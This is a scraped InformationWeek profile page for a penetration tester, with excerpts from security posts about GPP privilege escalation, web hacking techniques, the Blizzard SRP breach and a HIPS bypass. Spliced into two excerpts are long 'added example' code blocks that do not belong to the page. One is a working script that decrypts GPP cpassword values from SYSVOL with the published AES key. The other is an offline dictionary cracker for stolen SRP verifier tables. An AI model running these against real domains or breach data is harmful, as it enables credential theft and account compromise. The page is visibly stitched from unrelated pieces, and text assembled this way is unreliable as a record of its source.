InformationWeek: The Business Value of Technology

e2 Conference & Expo - Boston 2013

Informationweek Influencer

ChrisJohnRiley ♻ (@ChrisJohnRiley)

Twitter Bio:
--== I'm just this guy, you know! ==-- :: Penetration Tester :: Blogger (@catch22insec) :: Podcaster (@eurotrashsec)
Location:
Austria
Website:
http://blog.c22.cc

ChrisJohnRiley ♻'s Network
SophosLabs attrition.org Virus Bulletin Matt Simmons cedricpernet Chris Ensey novainfosec Rob Lewis adam shostack Nick Selby Bev Robb securitypro2009 MC Petermann Andrew Jaquith Gal Shpantzer Matt Johansen ChrisJohnRiley ♻ Dave Marcus SocialMediaSecurity Jeremiah Grossman BreakingPoint Nicolas Brulez Dave Piscitello Anita Campbell Mariano M. del Río ID Experts grecs SecurityBuzz Joel Libava Panda Security David Chartier Dave Whitelegg Ben Jackson Security4all Gunter Ollmann UBM Tech Electronics Chae Jong Bin Lookout SecurityWeek Brian Pennington eEyeDigitalSecurity Yuri Diogenes CiscoEDU Mikko Hypponen GarWarner Andrew Waite Patrik Runald Dept. of Technology briankrebs DEFCON jcran David Webroot Web Security News Javvad Malik Raf Mark Headd Chris Boyd

ChrisJohnRiley ♻'s Selections From the Web

Internal network pentesting involving domain controllers requires a few steps in order to gain domain administrator access. One of them usually requires gaining local administrator access to a workstation. In this article, we show how this can be possible from a limited domain user account when specific Group Policy Preferences (GPP) are deployed. GPP are new Active Directory features introduced in Windows 2008; documenting
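The excerpt stops before naming the mechanism, so the following is an added example, not code from this page or from the article it links to. It assumes the weakness documented in Microsoft's MS-GPPREF specification (section 2.2.1.1.4): when a GPP sets a local account password, the password is stored in an XML file under the domain's SYSVOL share (readable by every authenticated domain user) as a `cpassword` attribute, base64-encoded with its `=` padding stripped and AES-256-CBC encrypted with a zero IV under a key that Microsoft published and that is identical in every domain. The `Groups.xml` sample, the `LocalAdmin` account and its password are constructed for the example; the AES step is delegated to the `openssl` command-line tool, which is assumed to be installed, so no third-party Python module is needed.

```python
# Added example: locate cpassword attributes in a GPP Groups.xml and decrypt
# them with the AES-256 key published in MS-GPPREF 2.2.1.1.4.
import base64
import subprocess
import xml.etree.ElementTree as ET

# The published key is the same in every domain, which is the whole weakness.
GPP_AES_KEY_HEX = "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
GPP_IV_HEX = "00" * 16  # GPP encrypts with an all-zero IV


def _aes_cbc(data: bytes, decrypt: bool) -> bytes:
    """AES-256-CBC (PKCS#7 padding) with the published key, run through the
    openssl CLI (assumed installed) so the example needs no extra modules."""
    cmd = ["openssl", "enc", "-aes-256-cbc", "-K", GPP_AES_KEY_HEX, "-iv", GPP_IV_HEX]
    if decrypt:
        cmd.append("-d")
    return subprocess.run(cmd, input=data, capture_output=True, check=True).stdout


def gpp_decrypt(cpassword: str) -> str:
    """Turn a cpassword attribute value back into the cleartext password."""
    # GPMC strips the trailing '=' from the base64 text; restore it or
    # b64decode raises "Incorrect padding".
    padded = cpassword + "=" * (-len(cpassword) % 4)
    plaintext_utf16 = _aes_cbc(base64.b64decode(padded), decrypt=True)
    return plaintext_utf16.decode("utf-16-le")  # GPP stores the password as UTF-16LE


def gpp_encrypt(password: str) -> str:
    """Inverse of gpp_decrypt; used here only to build the constructed sample."""
    ciphertext = _aes_cbc(password.encode("utf-16-le"), decrypt=False)
    return base64.b64encode(ciphertext).decode("ascii").rstrip("=")


def find_gpp_passwords(xml_text: str):
    """Return (userName, cleartext) for every Properties element with a cpassword.
    The same attribute appears in other preference files (Services.xml,
    ScheduledTasks.xml, DataSources.xml, Drives.xml), which this also handles."""
    root = ET.fromstring(xml_text)
    hits = []
    for props in root.iter("Properties"):
        cp = props.get("cpassword")
        if cp:
            hits.append((props.get("userName"), gpp_decrypt(cp)))
    return hits


# Constructed sample (hypothetical account and password). A real file lives at
# \\<domain>\SYSVOL\<domain>\Policies\{<GUID>}\Machine\Preferences\Groups\Groups.xml
SAMPLE_GROUPS_XML = f"""<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="LocalAdmin" changed="2012-09-04 09:18:06">
    <Properties action="U" userName="LocalAdmin" cpassword="{gpp_encrypt('Local*P4ssword!')}"
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"/>
  </User>
</Groups>
"""

if __name__ == "__main__":
    for user, password in find_gpp_passwords(SAMPLE_GROUPS_XML):
        print(f"{user}: {password}")
```

In an engagement the loop would walk every `*.xml` under `\\<domain>\SYSVOL\<domain>\Policies\` rather than a single embedded string. Microsoft removed the ability to set passwords through GPP in MS14-025 (May 2014), but that update does not delete XML files already sitting in SYSVOL, so old `cpassword` values remain readable until an administrator removes them.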

Every year the security community produces a stunning amount of new Web hacking techniques that are published in various white papers, blog posts, magazine articles, mailing list emails, conference presentations, etc. Within the thousands of pages are the latest ways to attack websites, Web browsers, Web proxies, and their mobile platform equivalents. Beyond individual vulnerabilities with CVE numbers or system compromises, here we are solely focused on new and creative methods of Web-based attack. Now in its seventh year, The Top Ten Web Hacking Techniques list encourages information sharing, provides a centralized knowledge-base, and recognizes

So one of the core aspects of my mostly-kidding-but-no-really White Hat Hacker Flowchart is that, if the target is a web page, and it’s not running on your server, you kind of need permission to actively probe for vulnerabilities.

One could make the argument that you can detect who in the marketplace has a crack security team, by who’s willing and able to commit the resources for an open vulnerability review policy.

Some smaller sites have also jumped on board (mostly absorbing and reiterating Salesforce’s policy — cool!):

There are some interesting implications to all of this,

Blizzard announced today that they have suffered a major data breach, and sensitive user data was stolen from their servers. According to their statement the specific data stolen includes email address, the answer to the personal security question, and information relating to two-factor authentication. They also lost their SRP server-side verifier database, which is the database they use to verify user passwords.

And despite what Blizzard is claiming, I believe the vast majority of their users’ plain text passwords have been exposed as well.

We
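The computation behind the passage's concern, as an added example that is not code from this page or from the post it excerpts: a stolen SRP row contains the identity, the salt and the verifier, and the verifier is a deterministic function of those plus the password, so whoever holds the table can test password guesses offline at the cost of one modular exponentiation each. The derivation below is standard SRP-6a (x = H(salt | H(identity ":" password)), v = g^x mod N) with SHA-1 and the 1024-bit group from RFC 5054 Appendix A; Blizzard's actual hash, group and encoding are not on the page and are not assumed here. The users, passwords, wordlist and the `enroll`/`crack_verifier`/`crack_table` helpers are constructed for the example.

```python
# Added example: offline dictionary attack against a leaked SRP-6a verifier table.
import hashlib
import os

# 1024-bit safe prime and generator from RFC 5054, Appendix A.
N = int(
    "EEAF0AB9ADB38DD69C33F80AFA8FC5E86072618775FF3C0B9EA2314C9C256576"
    "D674DF7496EA81D3383B4813D692C6E0E0D5D8E250B98BE48E495C1D6089DAD1"
    "5DC7D7B46154D6B6CE8EF4AD69B15D4982559B297BCF1885C529F566660E57EC"
    "68EDBC3C05726CC02FD4CBF4976EAA9AFD5138FE8376435B9FC61D2FC0EB06E3",
    16,
)
g = 2


def srp_x(salt: bytes, identity: str, password: str) -> int:
    """x = H(salt | H(identity ':' password)); only the password is secret."""
    inner = hashlib.sha1(f"{identity}:{password}".encode("utf-8")).digest()
    return int.from_bytes(hashlib.sha1(salt + inner).digest(), "big")


def srp_verifier(salt: bytes, identity: str, password: str) -> int:
    """v = g^x mod N, the value the server stores instead of the password."""
    return pow(g, srp_x(salt, identity, password), N)


def enroll(identity: str, password: str) -> dict:
    """What the server keeps per user (the row an attacker steals): identity,
    random salt and verifier. The password itself is never stored."""
    salt = os.urandom(16)
    return {"I": identity, "s": salt, "v": srp_verifier(salt, identity, password)}


def crack_verifier(row: dict, wordlist) -> tuple:
    """Offline attack on one stolen row. Salt and identity come from the row,
    so each guess costs two SHA-1s and one modexp, with no round trip to the
    server and no rate limiting. Returns (password or None, guesses made)."""
    for n, guess in enumerate(wordlist, 1):
        if srp_verifier(row["s"], row["I"], guess) == row["v"]:
            return guess, n
    return None, len(wordlist)


def crack_table(rows, wordlist) -> dict:
    """Run the wordlist against every row. The per-user salt and the identity
    inside the hash defeat precomputed tables, not per-user guessing."""
    return {row["I"]: crack_verifier(row, wordlist)[0] for row in rows}


# Constructed "stolen" verifier table and a small wordlist (hypothetical users).
STOLEN_ROWS = [
    enroll("alice", "hunter2"),
    enroll("bob", "correct horse"),
    enroll("carol", "7hX#q!Lp2$vR9wZm"),
]
WORDLIST = ["123456", "password", "hunter2", "letmein", "correct horse", "qwerty"]

if __name__ == "__main__":
    for user, recovered in crack_table(STOLEN_ROWS, WORDLIST).items():
        print(f"{user}: {recovered if recovered else 'not in wordlist'}")
```

The point the example makes concrete: SRP keeps the password off the wire and out of the server's storage, but the verifier is a fast hash-then-exponentiate of the password, not a deliberately slow function like bcrypt or scrypt, so a leaked table protects only users whose passwords are not in the attacker's dictionary.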

This post discusses the issues that arise from the reliance on user-mode control flow monitoring techniques for the implementation of systems such as Host Based Intrusion Detection Systems, Sandboxes, Function Tracers, etc. It focuses on a single HIPS product offered by Comodo [1], a well respected company that helps the community by offering a number of their products free of charge. However, the techniques used by this product are not completely bulletproof and can be exploited by malicious agents to disable
